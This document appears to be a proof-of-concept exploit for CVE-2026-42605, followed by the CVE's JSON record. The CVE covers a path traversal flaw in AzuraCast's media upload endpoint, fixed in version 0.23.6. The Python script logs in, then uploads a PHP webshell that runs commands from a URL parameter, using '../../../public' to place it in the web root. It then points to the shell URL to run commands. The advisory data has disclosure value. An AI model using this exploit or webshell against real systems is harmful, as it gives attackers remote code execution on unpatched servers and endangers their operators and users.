CVE-2026-42605

import requests # Target configuration target_url = "http://target-azuracast.com" station_id = "1" login_url = f"{target_url}/login" upload_url = f"{target_url}/api/station/{station_id}/files/upload" username = "attacker" password = "password" # 1. Authenticate to get session session = requests.Session() login_data = {"username": username, "password": password} session.post(login_url, data=login_data) # 2. Prepare payload (PHP Webshell) webshell_content = "<?php system($_GET['cmd']); ?>" files = { 'file': ('shell.php', webshell_content, 'application/x-php') } # 3. Exploit Path Traversal in currentDirectory parameter # Adjust the number of '../' based on the directory depth payload_data = { 'currentDirectory': '../../../public' # Path traversal to web root } # 4. Send upload request response = session.post(upload_url, files=files, data=payload_data) if response.status_code == 200: print("[+] Exploit successful! Webshell uploaded.") print(f"[+] Access your shell at: {target_url}/shell.php?cmd=whoami") else: print("[-] Exploit failed.") print(response.text)

{"cve": {"id": "CVE-2026-42605", "sourceIdentifier": "[email protected]", "published": "2026-05-09T20:16:30.020", "lastModified": "2026-05-11T16:17:32.603", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "AzuraCast is a self-hosted, all-in-one web radio management suite. Prior to version 0.23.6, the currentDirectory request parameter in the Flow.js media upload endpoint (POST /api/station/{station_id}/files/upload) is not sanitized for path traversal sequences. When combined with a local filesystem storage backend (the default), an authenticated user with media management permissions can write arbitrary files outside the station's media storage directory, achieving remote code execution by writing a PHP webshell to the web root. This issue has been patched in version 0.23.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/AzuraCast/AzuraCast/commit/18c793b4427eb49e67a2fea99a89f1c9d9dd808d", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/releases/tag/0.23.6", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j", "source": "[email protected]"}, {"url": "https://github.com/AzuraCast/AzuraCast/security/advisories/GHSA-vp2f-cqqp-478j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}